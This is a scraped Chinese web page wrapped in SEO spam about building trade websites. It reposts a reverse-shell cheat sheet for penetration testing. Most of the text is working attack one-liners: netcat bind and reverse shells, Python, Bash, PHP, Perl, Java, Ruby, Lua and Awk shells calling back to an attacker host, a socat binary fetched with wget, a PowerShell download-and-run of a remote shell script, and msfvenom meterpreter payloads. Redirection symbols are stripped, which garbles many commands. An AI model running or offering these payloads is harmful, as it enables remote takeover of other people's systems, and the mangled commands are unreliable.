当前位置: 首页 > news >正文

自己如何做外贸公司网站做网站是自己公司做好还是外包好

自己如何做外贸公司网站,做网站是自己公司做好还是外包好,ppt超链接网站怎么做,高校网站群建设研究反弹shell总结 讲在前面说的话:反弹shell总结nc反弹shell正向shell反向shell正向shell(服务端被攻击):反向shell(客户端被攻击):无nc反弹shellpython反弹shellbash反弹shellPHP反向shellPerl反向shellJava反弹shellsocat 反弹shellRuby反弹shellLua反弹shellAwk 反弹she… 反弹shell总结 讲在前面说的话:反弹shell总结nc反弹shell正向shell反向shell正向shell(服务端被攻击):反向shell(客户端被攻击): 无nc反弹shellpython反弹shellbash反弹shellPHP反向shellPerl反向shellJava反弹shellsocat 反弹shellRuby反弹shellLua反弹shellAwk 反弹shellexec反弹shellpowershell反弹shell利用msf生成反弹shell kali综合渗透测试-常用代码各种反弹shell方法总结备忘shell分为两种,一种是正向shell,另一种是反向shell。(1)正向shell(2)反向shell 4.在目标主机中没有nc时获得反向shell(1)Python反向shell(2)Bash反向shell(3)PHP反向shell(4)Perl反向shell(5)Java脚本反弹shell(6)socat 反弹shell(7)Ruby反弹shell(8)Lua反弹shell(9)Awk反弹shell(10)exec反弹shell(11)nc反弹shell:(12)powershell反弹shell(13)从原生的 shell 环境切换到linux的交互式 bash 环境 通常我们nc获得的shell都是不完全shell,需要通过Python的pty转换为拥有完全命令行的完全shell,方便我们进行复制粘贴等操作。 【技术分享】linux各种一句话反弹shell总结简介一、场景一1.1 安装netcat1.2 开启本地监听1.3 直接连接目标主机 二、场景二2.1 bash 直接反弹2.2 netcat 工具反弹2.3 socat 反弹一句话2.4 其他脚本一句话shell反弹2.5 msfvenom 获取反弹一句话 三、场景三3.1 一句话添加账号3.2 python 标准虚拟终端获取 四、写在最后4.1 nc开启本地监听发布bash服务4.2 常用反弹shell一句话4.3 利用msfvenom获取反弹一句话4.4 使用python获取标准shell4.5 linux 一句话添加账户 学习参考 反弹SHELL汇总Reverse Shell Cheat SheetBashPERLPythonPHPRubyNetcatJavaxtermFurther Reading 几种常见反弹shell汇总0x01. bash0x02. nc(netcat)反弹0x03. telnet反弹常见脚本反弹1. python2. perl方法二:3. Ruby4. PHP5. Java6. Lua7. AWK 反弹 Reference 10种反弹shell方式参考链接:10种反弹shell方式1. bash2. perl3. python4. php5. ruby6. nc7. java8. xterm9. exec10. 从原生的 shell 环境切换到 linux 的交互式 bash 环境 讲在前面说的话: 没有任何基础的 推荐 【技术分享】linux各种一句话反弹shell总结 反弹shell总结 nc反弹shell 正向shell nc -lvp 1234 -e /bin/bash # linux 服务端(被攻击的主机)nc -lvp 1234 -e c:\windows\system32\cmd.exe # windows 服务端(被攻击的主机)nc host.example.com 1234 # linux 客户端rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 21 | nc -l host.example.com 1234 /tmp/f # linux 服务端(被攻击的主机)nc host.example.com 1234 # 客户端反向shell nc -lvp 1234 # 服务端nc host.example.com 1234 -e /bin/sh # linux 客户端 (被攻击的主机)nc host.example.com 1234 -e c:\windows\system32\cmd.exe # windows 客户端 (被攻击的主机)正向shell(服务端被攻击): 本地或vps将自己的shell传给服务器(端口监听在服务器上) 反向shell(客户端被攻击): 目标机器将shell主动传给本地或vps(端口监听在本地vps上) 无nc反弹shell python反弹shell nc -lvp 1234 # 服务端python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("host.example.com",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'# 绕过限制sudo提权 sudo python -c "import pty;pty.spawn("/bin/bash")"# 反弹shell后,显示当前用户信息 python -c "import pty; pty.spawn("/bin/bash")"bash反弹shell nc -lvp 1234 # 服务端bash -i /dev/tcp/host.example.com/1234 01 # 客户端 (被攻击的主机)PHP反向shell php -r '$sock=fsockopen("host.example.com",1234);exec("/bin/sh -i 3 3 23");'Perl反向shell perl -e 'use Socket;$i="host.example.com";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"S");open(STDOUT,"S");open(STDERR,"S");exec("/bin/sh -i");};'perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"host.example.com:1234");STDIN-fdopen($c,r);$~-fdopen($c,w);system$_ while;'Java反弹shell Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5/dev/tcp/host.example.com/1234;cat 5 | while read line; do $line 25 5; done"});p.waitFor();Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","bash -i /dev/tcp/host.example.com/1234 01"});p.waitFor();socat 反弹shell wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat chmod 755 /tmp/socat /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:host.example.com:1234Ruby反弹shell ruby -rsocket -e 'exit if fork;c=TCPSocket.new("host.example.com","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'ruby -rsocket -e 'c=TCPSocket.new("host.example.com","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'Lua反弹shell lua -e "require('socket');require('os');t=socket.tcp();t:connect('host.example.com','1234');os.execute('/bin/sh -i 3 3 23');"Awk 反弹shell awk 'BEGIN{s="/inet/tcp/0/host.example.com/1234";for(;s|getline c;close(c))while(c|getline)print|s;close(s)}'exec反弹shell exec 5/dev/tcp/host.example.com/1234 cat 5 | while read line; do $line 25 5; done0196;exec 196/dev/tcp/host.example.com/1234; sh 196196 2196powershell反弹shell apt-get install powshellpowershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress host.example.com -port 1234利用msf生成反弹shell Msfvenom生成一个反弹shell msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.212.6 LPORT=443 shell443.php利用模块 use exploit/multi/handlermsf生成一个war格式的反弹shell msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.5 lport=6666 -f war -o test.warmsfvenom生成一个payload,上传到目标,增加执行权限 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.212.6 LPORT=8888 -f elf shell.elfkali综合渗透测试-常用代码 命令执行漏洞反弹shell代码: echo “bash -i /dev/tcp/192.168.56.102/6666 01” | bashburpsuite抓包修改用户名密码的数据包内容代入数据库执行,反弹shell语句 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21
http://www.hkea.cn/news/14423012/

相关文章:

  • 如何用博客网站做cpa品牌营销策划案例ppt
  • 做网站好的书各大网站rss订阅源地址
  • 智能建站网站做网站建设很赚钱吗
  • 网站建设方案维护潍坊百度搜索优化
  • 慈溪网站制作哪家最便宜专业的上海网站建设公司哪家好
  • 哈尔滨专业做网站公司wordpress 微信登录插件下载
  • 网站建设管理员工工资多少网站的做
  • 手机网站 微信链接宁波网站制作价格
  • 网站内容栏由什么构成微信做单网站有哪些
  • 万网网站流量深圳怎么制作公司网页
  • 个人网站域名名字wordpress 高亮代码
  • 易读网站建设晋江哪里可以学建设网站
  • 有哪个网站是成都中科大旗做的商城网站开发报价方案
  • 新乡哪里有做网站的沈阳网站建设选网龙
  • 个人 网站备案 幕布手机壳图案设计网站
  • 工伤做实的那个网站网站建设定制网站建设公司
  • 网站直播是未开票收入怎么做推广方法英文
  • 全球旅游网站排名客源引流推广
  • 上海网站推广维新网站建设包括哪几个方面
  • 榆林微网站建设开源saas建站系统
  • 新浪sae可以做网站么济宁网站建设公司电话
  • 苏州网站开发公司兴田德润优惠吗网站热力图工具
  • 充实网站 廉政建设 板块网站做备案需要多久
  • 家具营销型网站建设网站的教程
  • 西安网站建设设计公司百度开车关键词
  • 南京 做网站wordpress如何更改页面链接
  • 河间做网站的公司上海响应式网站建设公司
  • 重庆建站培训分公司注册流程网上注册
  • 六安网站怎么做seowordpress公众号模板
  • 广州建设网站哪个好做网站如何更新百度快照